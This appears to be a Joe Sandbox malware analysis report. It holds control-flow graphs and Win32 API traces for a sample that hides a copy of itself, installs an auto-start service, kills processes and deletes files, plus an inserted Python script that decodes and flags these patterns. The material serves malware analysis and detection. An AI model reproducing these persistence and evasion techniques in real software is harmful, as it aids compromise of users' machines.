9700 ed1bb0 2 API calls 9698->9700 9701 ed1bb0 2 API calls 9699->9701 9702 ed5b9f 9700->9702 9701->9702 9704 ed5bea 9702->9704 9703->9472 9705 ed5d53 CreateDirectoryA 9704->9705 9706 ed5d9a 9705->9706 9707 ece430 lstrlen 9706->9707 9708 ed5e4f CreateDirectoryA 9707->9708 9709 ec2f90 2 API calls 9708->9709 9710 ed5e9e 9709->9710 9711 ec2f90 2 API calls 9710->9711 9712 ed5f4c 9711->9712 9713 ed1bb0 2 API calls 9712->9713 9714 ed5f68 9713->9714 9715 ecd530 9 API calls 9714->9715 9716 ed5f86 9715->9716 9717 ed1bb0 2 API calls 9716->9717 9718 ed5fcf 9717->9718 9719 ed1d90 5 API calls 9718->9719 9720 ed6002 9719->9720 9721 ed600d GetTempPathA 9720->9721 9722 ed6485 9720->9722 10050 ecd500 lstrlen 9721->10050 9722->9687 9724 ed604f 9725 ece430 lstrlen 9724->9725 9726 ed61cb CreateDirectoryA 9725->9726 9728 ed6219 9726->9728 9729 ec2f90 2 API calls 9728->9729 9730 ed6237 9729->9730 9731 ec2f90 2 API calls 9730->9731 9732 ed62be 9731->9732 9733 ed1bb0 2 API calls 9732->9733 9734 ed6302 9733->9734 9735 ecd530 9 API calls 9734->9735 9736 ed6360 9735->9736 9737 ed1bb0 2 API calls 9736->9737 9738 ed6372 9737->9738 9739 ed1d90 5 API calls 9738->9739 9740 ed63b5 9739->9740 9740->9722 9741 ed63c0 GetTempPathA 9740->9741 9742 ed63ff 9741->9742 9743 ec2f90 2 API calls 9742->9743 9744 ed642d 9743->9744 9745 ed1bb0 2 API calls 9744->9745 9745->9722 10089 ecd500 lstrlen 9746->10089 9748 eeb9c3 9748->9488 9749->9493 9751 eca53c 9750->9751 9751->9497 9753 ed8a95 9752->9753 10090 ecca40 9753->10090 9755 ed8b1d 9756 eefa80 3 API calls 9755->9756 9757 ed8b65 9756->9757 9757->9525 9759 ee9902 9758->9759 9760 ee95a9 9758->9760 9759->9530 10128 ecd500 lstrlen 9760->10128 9762 ee965d Sleep 9763 ee96b9 9762->9763 9764 ec2f90 2 API calls 9763->9764 9765 ee96e9 9764->9765 9766 ed1bb0 2 API calls 9765->9766 9767 ee979d FindFirstFileA 9766->9767 9768 ee97d6 9767->9768 9768->9759 9769 ee9877 DeleteFileA FindNextFileA 9768->9769 9769->9768 9770 ee98d9 FindClose 9769->9770 9770->9759 9771->9537 9773 
ec281d 9772->9773 9774 ec283e ExitProcess 9773->9774 9776 ee48d0 lstrlen 9775->9776 9777 ece451 9776->9777 9778 ece480 9777->9778 10129 ecd500 lstrlen 9777->10129 9778->9506 9781 ed218c 9780->9781 9782 ed2196 CreateToolhelp32Snapshot 9780->9782 9781->9782 9783 ed21fe Process32First 9782->9783 9784 ed2450 9782->9784 9786 ed240d CloseHandle 9783->9786 9788 ed227a 9783->9788 9784->9535 9786->9784 9787 eca4e0 lstrlen 9787->9788 9788->9787 9789 ed2346 Process32Next 9788->9789 9790 ed239c 9788->9790 9789->9788 9789->9790 9790->9786 9792 ef0958 __aulldiv 9791->9792 9792->9535 9794 ecbbe1 CreateToolhelp32Snapshot 9793->9794 9796 ecbcbb Process32First 9794->9796 9798 ecbf47 9794->9798 9797 ecbf1a CloseHandle 9796->9797 9803 ecbd05 9796->9803 9797->9798 9798->9551 9799 eca4e0 lstrlen 9799->9803 9800 ecbdbb OpenProcess 9801 ecbe02 TerminateProcess 9800->9801 9800->9803 9801->9803 9804 ecbe67 CloseHandle 9801->9804 9802 ecbedd Process32Next 9802->9803 9805 ecbf19 9802->9805 9803->9799 9803->9800 9803->9802 9803->9804 9804->9803 9805->9797 9807 ed157f CreateFileA 9806->9807 9808 ed1561 9806->9808 9809 ed1611 9807->9809 9808->9807 9810 ed1657 9809->9810 9811 ed1673 GetFileTime 9809->9811 9810->9549 9812 ed1694 CloseHandle 9811->9812 9813 ed16bf __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9811->9813 9812->9549 9814 ed1771 GetFileSize CloseHandle 9813->9814 9815 ed17be 9814->9815 9815->9549 9817 eefaaa 9816->9817 9818 eefb6a CreateProcessA 9817->9818 9819 eefc8f 9818->9819 9820 eefbff CloseHandle CloseHandle 9818->9820 9819->9570 9820->9570 9822 ee3d35 9821->9822 9823 ece430 lstrlen 9822->9823 9824 ee3d66 9823->9824 9825 ec2f90 2 API calls 9824->9825 9826 ee3d82 9825->9826 9827 ed1bb0 2 API calls 9826->9827 9828 ee3dd1 CreateFileA 9827->9828 9829 ee3e32 9828->9829 9829->9511 9831 ee9b93 9830->9831 9832 ee9c40 GetComputerNameA 9831->9832 9833 ee9c53 9832->9833 9834 ee9cbb 9832->9834 9835 ec2f90 2 API calls 9833->9835 9836 ec2f90 2 API calls 9834->9836 9837 ee9c7e 9835->9837 9838 
ee9d55 9836->9838 9839 ed1bb0 2 API calls 9837->9839 9840 ed1bb0 2 API calls 9838->9840 9839->9834 9841 ee9db1 9840->9841 9842 ecd530 9 API calls 9841->9842 9843 ee9dd5 9842->9843 10130 ed2c30 9843->10130 9845 ee9e08 10133 eda930 9845->10133 9847 ee9f23 10172 ecd500 lstrlen 9847->10172 9849 ee9f65 10173 ef01a0 9849->10173 9853 ee9fcf 9854 ed2c30 8 API calls 9853->9854 9855 ee9ffe 9854->9855 9856 ef01a0 9 API calls 9855->9856 9857 eea0a3 9856->9857 9858 ef1050 8 API calls 9857->9858 9859 eea0b2 9858->9859 9860 ed2c30 8 API calls 9859->9860 9861 eea0dd 9860->9861 9862 ef01a0 9 API calls 9861->9862 9863 eea118 9862->9863 9864 ef1050 8 API calls 9863->9864 9865 eea127 9864->9865 9866 ed2c30 8 API calls 9865->9866 9867 eea16c 9866->9867 9868 ef01a0 9 API calls 9867->9868 9869 eea18b 9868->9869 9870 ef1050 8 API calls 9869->9870 9871 eea197 9870->9871 9872 ed2c30 8 API calls 9871->9872 9873 eea1e1 9872->9873 9874 ef01a0 9 API calls 9873->9874 9875 eea204 9874->9875 9876 ef1050 8 API calls 9875->9876 9877 eea213 9876->9877 9878 ed2c30 8 API calls 9877->9878 9879 eea248 9878->9879 9880 ec2f90 2 API calls 9879->9880 9881 eea280 9880->9881 9882 ef01a0 9 API calls 9881->9882 9883 eea2bf 9882->9883 9884 ef1050 8 API calls 9883->9884 9885 eea2ce 9884->9885 9886 ed1bb0 2 API calls 9885->9886 9887 eea2f5 9886->9887 9888 ed2c30 8 API calls 9887->9888 9889 eea31b 9888->9889 9890 ef01a0 9 API calls 9889->9890 9891 eea347 9890->9891 9892 ef1050 8 API calls 9891->9892 9893 eea353 9892->9893 9894 ed2c30 8 API calls 9893->9894 9895 eea391 9894->9895 9896 ef01a0 9 API calls 9895->9896 9897 eea3aa 9896->9897 9898 ef1050 8 API calls 9897->9898 9899 eea3b9 9898->9899 9900 ed2c30 8 API calls 9899->9900 9901 eea402 9900->9901 10180 ed2f60 9901->10180 9905 eea465 9906 ef01a0 9 API calls 9905->9906 9907 eea471 9906->9907 9908 ef1050 8 API calls 9907->9908 9909 eea480 9908->9909 9910 ed2c30 8 API calls 9909->9910 9911 eea4d1 9910->9911 9912 ef01a0 9 API calls 9911->9912 9913 eea502 9912->9913 
9914 ef1050 8 API calls 9913->9914 9915 eea511 9914->9915 10189 ed97b0 9915->10189 9917 eea54f 10216 edd990 9917->10216 9919 eea575 10219 ed4290 9919->10219 9921 eea5b3 10223 ee0480 9921->10223 9923 eea63b 9923->9516 9925 ee4926 9924->9925 10274 ecd500 lstrlen 9925->10274 9927 ee4948 9927->9542 9929 ee3110 WaitForSingleObject 9928->9929 9930 ecc562 9929->9930 9931 ec2800 ExitProcess 9930->9931 9932 ecc578 9931->9932 9932->9554 9934 edee9d 9933->9934 9935 ece430 lstrlen 9934->9935 9936 edeef8 9935->9936 9937 ec2f90 2 API calls 9936->9937 9938 edef29 9936->9938 9939 edef91 9937->9939 9938->9560 9940 ed1bb0 2 API calls 9939->9940 9941 edf001 9940->9941 10275 ecd000 9941->10275 9943 edf020 9943->9560 9945 ef08b0 GetSystemTimeAsFileTime 9944->9945 9946 ec2703 9945->9946 9947 ec27c8 9946->9947 9948 ef08b0 GetSystemTimeAsFileTime 9946->9948 9947->9553 9950 ec2751 9948->9950 9949 ec2770 Sleep 9949->9950 9950->9947 9950->9949 9951 ef08b0 GetSystemTimeAsFileTime 9950->9951 9951->9950 9953 ed055f CreateServiceA 9952->9953 9954 ed07be 9952->9954 9955 ed05be 9953->9955 9954->9568 9956 ed06bc OpenServiceA 9955->9956 9957 ed05d8 ChangeServiceConfig2A StartServiceA 9955->9957 9961 ed0716 StartServiceA CloseServiceHandle 9956->9961 9962 ed075e CloseServiceHandle 9956->9962 9958 ed067e CloseServiceHandle 9957->9958 9958->9962 9961->9962 9962->9954 9965 ed7ab7 9964->9965 9966 ec2f90 2 API calls 9965->9966 9967 ed7b71 9966->9967 9968 ed1bb0 2 API calls 9967->9968 9969 ed7bcb 9968->9969 9970 ed7cc0 RegCloseKey 9969->9970 10293 ecd500 lstrlen 9969->10293 9971 ec9c15 9970->9971 9971->9577 9973 ed7c87 RegSetValueExA 9973->9970 9975 ee312e WaitForSingleObject 9974->9975 9977 ec9d15 9975->9977 9977->9585 9979 ed0de7 9978->9979 9980 ed0f4e CreateFileA 9979->9980 9981 ed0f80 9980->9981 9981->9605 9983 ed126b 9982->9983 9984 ed1254 9982->9984 9985 ec2f90 2 API calls 9983->9985 9986 ed0920 8 API calls 9984->9986 9987 ed12b3 9985->9987 9986->9983 9988 ed0dc0 CreateFileA 9987->9988 9989 ed12cd 
[Control-flow graph edge list, continued from the preceding lines; the original page renders it as a graph. Basic blocks and Win32 calls recoverable from this fragment: Sleep (ED1378); file I/O built on CreateFileA/ReadFile/WriteFile/CloseHandle (ED0DC0, ED10E0, ED1D9D..ED2069, ECCAA0..ECCF46 with GetTickCount and FindCloseChangeNotification, ECD0F2..ECD3E3); heap helpers GetProcessHeap/RtlAllocateHeap/HeapAlloc/RtlReAllocateHeap/HeapFree (ECE2F2, ED68D0); string helpers wvsprintfA and lstrlen (EF587D, ECD500); CheckTokenMembership (ECB86A); GetProcAddress and GetCurrentProcess (ECFC76, ECFCC5, ED0A68, ED0AE7); GetWindowsDirectoryA (ECF0D0); WaitForSingleObject/ReleaseMutex locking around file writes (EE3110, EEFCC0); LoadLibraryA/GetProcAddress/FreeLibrary dynamic imports (EDAB6A..EDB6AD); a service control handler at ED6C10 built on RegisterServiceCtrlHandlerA, SetServiceStatus, CreateEventA, WaitForSingleObject and CloseHandle; ExitProcess at ECE240 and EE4672; and a self-looping Sleep block at ECA310.]
APIs
• GetEnvironmentVariableA.KERNEL32(00000000,C:\Users\user,00000104), ref: 00EC83DA
• CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00EC8448
• CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00EC84DC
• CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 00EC84F7
• GetTickCount.KERNEL32 ref: 00EC8599
  • Part of subcall function 00ED5200: GetVersionExA.KERNEL32(00F4AE70), ref: 00ED52CC
• Sleep.KERNEL32(00000D05), ref: 00EC8B70
• Sleep.KERNEL32(000007D0), ref: 00EC8DAC
• GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00EC8E86
• SetFileAttributesA.KERNEL32(?,00000080), ref: 00EC8E9F
• CopyFileA.KERNEL32(?,?,00000000), ref: 00EC8EC3
• SetFileAttributesA.KERNEL32(?,00000002), ref: 00EC912B
• SetFileAttributesA.KERNEL32(?,00000080), ref: 00EC9186
• GetCommandLineA.KERNEL32 ref: 00EC9265
• GetModuleFileNameA.KERNEL32(00000000,?), ref: 00EC9370
  • Part of subcall function 00ECA4E0: lstrlen.KERNEL32(?), ref: 00ECA4FE
  • Part of subcall function 00ECD500: lstrlen.KERNEL32(?,?,00ECD630,?), ref: 00ECD523
• MessageBoxA.USER32(00000000,00000004,00000005,?), ref: 00EC96D4
• CloseHandle.KERNEL32(00000000), ref: 00EC9AC8
• SetFileAttributesA.KERNEL32(?,00000080), ref: 00EC9AEC
• CopyFileA.KERNEL32(?,?,00000000), ref: 00EC9B0C
• SetFileAttributesA.KERNEL32(?,00000002), ref: 00EC9B3B
• Sleep.KERNEL32(000003E8), ref: 00EC9C52
• Sleep.KERNEL32(000003E8), ref: 00EC8CB2
  • Part of subcall function 00ECBBC0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ECBC90
  • Part of subcall function 00ECBBC0: Process32First.KERNEL32(00000000,?), ref: 00ECBCE3
• GetCommandLineA.KERNEL32 ref: 00EC86AE
  • Part of subcall function 00EC2800: ExitProcess.KERNEL32 ref: 00EC2842
  • Part of subcall function 00EF08B0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00EF0929
  • Part of subcall function 00EF08B0: __aulldiv.LIBCMT ref: 00EF0953
• Sleep.KERNEL32(000007D0), ref: 00EC9E32
• SetFileAttributesA.KERNEL32(00F0D800,00000080), ref: 00EC9E88
• CopyFileA.KERNEL32(?,00F0D800,00000000), ref: 00EC9EA6
• SetFileAttributesA.KERNEL32(00F0D800,00000002), ref: 00EC9EC5
  • Part of subcall function 00ED0500: OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00ED0537
  • Part of subcall function 00ED0500: CreateServiceA.ADVAPI32(00000000,015BFCE0,015BFCE0,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00ED0596
  • Part of subcall function 00ED0500: ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00ED0615
  • Part of subcall function 00ED0500: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00ED062A
• CreateThread.KERNEL32(00000000,00000000,Function_000222A0,00000000,00000000,00000000), ref: 00ECA26A
• Sleep.KERNEL32(0000C350), ref: 00ECA327
Strings
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID: File$Attributes$CreateSleep$CopyMutexService$CommandLineModuleNameTimelstrlen$ChangeCloseConfig2CountEnvironmentExitFirstHandleManagerMessageOpenProcessProcess32SnapshotStartSystemThreadTickToolhelp32VariableVersion__aulldiv
• String ID: zS$%Tmd$C:\Users\user$@L$}en
• API String ID: 2964372999-4230071128
• Opcode ID: 0be5985b8fe799c8f1809fd632388080f1bc45ba70144bf09da8d2b30f7f602b
• Instruction ID: 63fad7c220372febe3c93908021eb780faca9e1418d5aa322e1edbe151803368
• Opcode Fuzzy Hash: 0be5985b8fe799c8f1809fd632388080f1bc45ba70144bf09da8d2b30f7f602b
• Instruction Fuzzy Hash: 282366B5A0030DDFD304EF61FE8AA763BB6F795320B11401AE941A62B5EB719861FF41
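The API list above records the hex arguments the sandbox saw at each call site, and reading them raw hides the point: SetFileAttributesA(?,00000002) marks the copied file hidden, CreateServiceA(...,000F01FF,00000110,00000002,...) asks for SERVICE_ALL_ACCESS on an own-process, interactive, auto-start service, and Sleep(0000C350) is a 50-second pause. The following script is an added triage example, not code from Joe Sandbox or from the sample; it parses these "APIs" bullets (the ones above and the ED5200 list further down, a subset of which is embedded as constructed input), names the Win32 constants from hand-picked SDK values, and applies four heuristics of my own that approximate the report's self-copy, service-install, process-enumeration and long-sleep signatures. The bullet format it expects is the one as extracted on this page; on a differently formatted export the regular expression would need adjusting.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed input: "APIs" bullets copied verbatim from this report (the function
# at 00EC83DA..00ECA327, plus the last line of the subcall 00ED5200 further down).
SAMPLE_APIS = r"""
• GetTickCount.KERNEL32 ref: 00EC8599
• Sleep.KERNEL32(00000D05), ref: 00EC8B70
• GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00EC8E86
• SetFileAttributesA.KERNEL32(?,00000080), ref: 00EC8E9F
• CopyFileA.KERNEL32(?,?,00000000), ref: 00EC8EC3
• SetFileAttributesA.KERNEL32(?,00000002), ref: 00EC912B
  • Part of subcall function 00ECBBC0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ECBC90
  • Part of subcall function 00ED0500: OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00ED0537
  • Part of subcall function 00ED0500: CreateServiceA.ADVAPI32(00000000,015BFCE0,015BFCE0,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00ED0596
  • Part of subcall function 00ED0500: StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00ED062A
• Sleep.KERNEL32(0000C350), ref: 00ECA327
• SetFileAttributesA.KERNELBASE(?,00000002), ref: 00ED655F
"""

# One bullet: "• [Part of subcall function XXXX: ]Api.Module[(args)], ref: ADDR"
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.\w+(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class ApiCall:
    api: str
    args: List[str]                # raw sandbox arguments; '?' = not recorded
    ref: int                       # call-site address
    subcall: Optional[int] = None  # subcall function the line is attributed to

def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):  # skips headers, blanks
        raw = m.group("args")
        calls.append(ApiCall(m.group("api"), [a.strip() for a in raw.split(",")] if raw else [],
                             int(m.group("ref"), 16),
                             int(m.group("sub"), 16) if m.group("sub") else None))
    return calls

# Win32 constants behind the arguments that carry meaning (values from the SDK headers),
# keyed by API, as (0-based parameter index in the prototype, parameter name, table).
DECODERS = {
    "SetFileAttributesA": [(1, "dwFileAttributes", {0x2: "FILE_ATTRIBUTE_HIDDEN", 0x80: "FILE_ATTRIBUTE_NORMAL"})],
    "OpenSCManagerA": [(2, "dwDesiredAccess", {0x2: "SC_MANAGER_CREATE_SERVICE"})],
    "CreateServiceA": [(3, "dwDesiredAccess", {0xF01FF: "SERVICE_ALL_ACCESS"}),
                       (4, "dwServiceType", {0x10: "SERVICE_WIN32_OWN_PROCESS", 0x100: "SERVICE_INTERACTIVE_PROCESS"}),
                       (5, "dwStartType", {0x2: "SERVICE_AUTO_START", 0x3: "SERVICE_DEMAND_START"})],
    "CreateToolhelp32Snapshot": [(0, "dwFlags", {0x2: "TH32CS_SNAPPROCESS"})],
}

def hexarg(arg: str) -> Optional[int]:
    try:
        return int(arg, 16)
    except ValueError:
        return None  # '?', a string, or a symbol such as Function_000222A0

def decode_value(value: int, table: Dict[int, str]) -> str:
    if value in table:  # exact match first: dwStartType is an enum, not a bit set
        return table[value]
    names = [n for bit, n in table.items() if (value & bit) == bit]
    return "|".join(names) if names else hex(value)

def decode(call: ApiCall) -> Dict[str, str]:
    """Name the constants in one call, e.g. CreateServiceA dwStartType 2 -> SERVICE_AUTO_START."""
    out: Dict[str, str] = {}
    if call.api == "Sleep" and call.args and hexarg(call.args[0]) is not None:
        out["dwMilliseconds"] = f"{hexarg(call.args[0])} ms"
    for idx, name, table in DECODERS.get(call.api, []):
        if idx < len(call.args):
            v = hexarg(call.args[idx])
            out[name] = decode_value(v, table) if v is not None else call.args[idx]
    return out

def triage(calls: List[ApiCall], long_sleep_ms: int = 30_000) -> List[str]:
    """Heuristics for the self-copy / service-install / evasion chain the report's signatures name."""
    apis, hits = {c.api for c in calls}, []
    decoded = [(c, decode(c)) for c in calls]
    if {"GetModuleFileNameA", "CopyFileA"} <= apis and any(
            "HIDDEN" in d.get("dwFileAttributes", "") for _, d in decoded):
        hits.append("self-copy: GetModuleFileNameA + CopyFileA, copy marked FILE_ATTRIBUTE_HIDDEN")
    if {"OpenSCManagerA", "CreateServiceA", "StartServiceA"} <= apis:
        d = next(d for c, d in decoded if c.api == "CreateServiceA")
        hits.append(f"service persistence: {d.get('dwServiceType')} start={d.get('dwStartType')}")
    if any("SNAPPROCESS" in d.get("dwFlags", "") for _, d in decoded):
        hits.append("process enumeration: CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS)")
    sleeps = [int(d["dwMilliseconds"].split()[0]) for _, d in decoded if "dwMilliseconds" in d]
    if max(sleeps, default=0) >= long_sleep_ms:
        hits.append(f"long sleep: {max(sleeps)} ms (possible sandbox evasion)")
    return hits

if __name__ == "__main__":
    for hit in triage(parse_api_lines(SAMPLE_APIS)):
        print("FINDING:", hit)
```

The heuristics are presence-based on purpose: the report lists call sites in address order within a function, not in execution order, so a sequence check would be a false precision. The decoder looks an argument up as an exact value before treating it as a bit set, because dwStartType is an enumeration (3 means SERVICE_DEMAND_START, not AUTO|something) while dwServiceType (0x110) really is a combination of flags.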

Control-flow Graph

[Control-flow graph of the function at ED5200 (basic blocks ED5200 through ED657C); the original page renders it as a graph with nodes marked Executed / Not Executed. Win32 calls recoverable from the edge list, in block order: GetVersionExA (ED52B2), CreateDirectoryA (ED5496), DeleteFileA and RemoveDirectoryA (ED56D6), CreateDirectoryA (ED580C, ED58AD, ED5D10, ED5E43), GetTempPathA (ED600D), CreateDirectoryA (ED61F6), GetTempPathA (ED63C0), SetFileAttributesA (ED653D). Internal subcalls referenced: EF0A20, ECB7A0, ECFBC0, ECF0D0, EC2F90, ECD530, ED1BB0, ECD670, ECDEF0, ED1D90, ECC580, EC13E0, ECE430, EF5820, EEA7E0, ECE310, ECD500.]
APIs
• GetVersionExA.KERNEL32(00F4AE70), ref: 00ED52CC
• CreateDirectoryA.KERNELBASE(0000005C,00000000), ref: 00ED549F
• DeleteFileA.KERNELBASE(?), ref: 00ED56FE
• RemoveDirectoryA.KERNELBASE(00000000), ref: 00ED5743
• CreateDirectoryA.KERNELBASE(?,00000000), ref: 00ED583A
• CreateDirectoryA.KERNELBASE(?,00000000), ref: 00ED58F3
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00ED5D71
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00ED5E82
• GetTempPathA.KERNEL32(00000104,?), ref: 00ED6029
• CreateDirectoryA.KERNEL32(?,00000000), ref: 00ED61FF
• GetTempPathA.KERNEL32(00000104,?), ref: 00ED63DE
• SetFileAttributesA.KERNELBASE(?,00000002), ref: 00ED655F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332871344.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332916326.0000000000EF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000EFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332933550.0000000000F4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000000.00000002.1333011841.0000000000F4B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Directory$Create$FilePathTemp$AttributesDeleteRemoveVersion
                                                                                                                                                                                                            • String ID: C:\Users\user$C:\whfkpbh\$\$aE'P$r9:
                                                                                                                                                                                                            • API String ID: 1691758827-1166413814
                                                                                                                                                                                                            • Opcode ID: 925bb23051e8c471d6ebb5af2d26a76914bdfcd0091c4bed04c4f089a929a301
                                                                                                                                                                                                            • Instruction ID: abfcbe54bab54213d3814a72406be92ffaf4c5afe7be77e91e877da7650f0108
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 925bb23051e8c471d6ebb5af2d26a76914bdfcd0091c4bed04c4f089a929a301
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DA27AB6A0030DCFD704EF24FD86AB537B2F794320B11812AE941A62B5EB349856FF55

Control-flow Graph (rendered graph not recoverable; basic blocks 00EE9580-00EE9966, API calls in graph: Sleep, FindFirstFileA, DeleteFileA, FindNextFileA, FindClose; legend: Executed / Not Executed)
APIs
• Sleep.KERNELBASE(000003E8,00000001), ref: 00EE9679
• FindFirstFileA.KERNELBASE(?,?), ref: 00EE97B8
• DeleteFileA.KERNELBASE(?), ref: 00EE98A9
• FindNextFileA.KERNELBASE(00000000,?), ref: 00EE98CB
• FindClose.KERNEL32(00000000), ref: 00EE98E4
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID: FileFind$CloseDeleteFirstNextSleep
• String ID:
• API String ID: 1528862845-0
• Opcode ID: ac1e4c0ab9b9a831f95783fb47e694b7c0f9868916f5366c2f48237303551781
• Instruction ID: 6950b8e73a50d5a6e940f58eec48b889bba21fdfee3a4a832c18852762fef3a6
• Opcode Fuzzy Hash: ac1e4c0ab9b9a831f95783fb47e694b7c0f9868916f5366c2f48237303551781
• Instruction Fuzzy Hash: 6E91647990030CCFC704DF65FD826A53BB2FBA5320B00851AE941E72B0EB749991EF91

Control-flow Graph (rendered graph not recoverable; basic blocks 00ECB7A0-00ECB90E, API calls in graph: AllocateAndInitializeSid, CheckTokenMembership; legend: Executed / Not Executed)
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00ECB82B
• CheckTokenMembership.KERNELBASE(00000000,?,?), ref: 00ECB87D
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID: AllocateCheckInitializeMembershipToken
• String ID:
• API String ID: 1663163955-0
• Opcode ID: b99b2ea2c07c3505035aaa926b0df1d29582cfe75327581fdafaed6894d9bf2d
• Instruction ID: ffba2ceb94bf1456ea7a13a27e2998c7e67abb3f18d5470507547d5549dffcda
• Opcode Fuzzy Hash: b99b2ea2c07c3505035aaa926b0df1d29582cfe75327581fdafaed6894d9bf2d
• Instruction Fuzzy Hash: A231FE7590534CEFD704CFA4EE999BA7BB8FB95300B00808EE802A72B0C7705949EB51

Control-flow Graph (rendered graph not recoverable; basic blocks 00ECE2C0-00ECE306, API calls in graph: GetProcessHeap, RtlAllocateHeap; legend: Executed / Not Executed)
APIs
• GetProcessHeap.KERNEL32(00000000,?,?,00EF220A,02167FFC,?,?,?,?,00EE463C), ref: 00ECE2F8
• RtlAllocateHeap.NTDLL(00000000,?,00EF220A,02167FFC,?,?,?,?,00EE463C), ref: 00ECE2FF
Memory Dump Source
• Source File: 00000000.00000002.1332887026.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_mtuXDnH1Di.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
• Opcode ID: 4c5f0027bc496a47bcb0fd545884c702094ba51f364c49c1d3fad905b4552f84
• Instruction ID: 095c8ced1ab3ed5ad4d1d26c4e797ec5230e1cd480721d6be8fef5534ee31a56
• Opcode Fuzzy Hash: 4c5f0027bc496a47bcb0fd545884c702094ba51f364c49c1d3fad905b4552f84
• Instruction Fuzzy Hash: 7AE04F76104208AFC7089BA6EC49A6537E8FB45205B048049F909D6275CA31A595DB94

Control-flow Graph (rendered graph not recoverable; basic blocks 00ECCA40-00ECCFF0, API calls in graph: CreateFileA, ReadFile, FindCloseChangeNotification, GetTickCount, CreateFileA, WriteFile, CloseHandle; legend: Executed / Not Executed)
APIs
• CreateFileA.KERNELBASE(?,80000000,?,00000000,00000003,00000000,00000000), ref: 00ECCB20
• ReadFile.KERNELBASE(00000000,?,?,?,00000000), ref: 00ECCB5D
• FindCloseChangeNotification.KERNELBASE(00000000), ref: 00ECCBBD
• GetTickCount.KERNEL32 ref: 00ECCC1D
• CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00ECCED4
• WriteFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 00ECCF0E
• CloseHandle.KERNEL32(00000000), ref: 00ECCF47
Memory Dump Source
